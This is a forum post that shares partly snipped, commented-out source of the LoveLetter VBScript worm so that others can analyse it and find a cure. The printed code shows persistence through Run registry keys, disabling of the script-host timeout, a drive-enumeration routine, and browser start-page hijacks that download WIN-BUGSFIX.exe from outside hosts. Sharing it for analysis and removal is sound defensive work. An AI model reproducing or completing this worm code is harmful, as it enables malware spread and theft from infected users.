My ex-girlfriend just got this virus, and she was kind enough to copy the code to a text file and send it to me. If anyone wants to pick this apart, have fun, and maybe figure out how to cure it so I don't have to reformat her hard drive...
WARNING! VIRUS! DO NOT RUN!
VB Code:
'Rem barok -loveletter(vbe) <i hate go to school> 'Rem by: spyder / [email][email protected][/email] / @GRAMMERSoft Group / Manila,Philippines 'On Error Resume Next 'Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow 'eq = "" 'ctr = 0 'Set fso = CreateObject("Scripting.FileSystemObject") 'Set file = fso.OpenTextFile(WScript.ScriptFullName, 1) 'vbscopy = file.ReadAll 'main() 'Sub main() 'On Error Resume Next 'Dim wscr, rr 'Set wscr = CreateObject("WScript.Shell") 'rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") 'If (rr >= 1) Then 'wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD" 'End If '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color] 'html() 'spreadtoemail() 'listadriv() 'End Sub 'Sub regruns() 'On Error Resume Next 'Dim num, downread 'regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" 'regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" 'downread = "" 'downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") 'If (downread = "") Then 'downread = "c:\" 'End If 'if (fileexist(dirsystem&"\WinFAT32.exe")=1) then 'Randomize 'num = Int((4 * Rnd) + 1) 'If num = 1 Then 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" 'ElseIf num = 2 Then 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" 'ElseIf num = 3 Then 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" 'ElseIf num = 4 Then 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" 'End If 'End If '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color] 'End Sub 'Sub listadriv() 'On Error Resume Next 'Dim d, dc, s 'Set dc = fso.Drives 'For Each d In dc 'If d.DriveType = 2 Or d.DriveType = 3 Then 'folderlist(d.path&"\") 'End If 'Next 'listadriv = s 'End Sub




Reply With Quote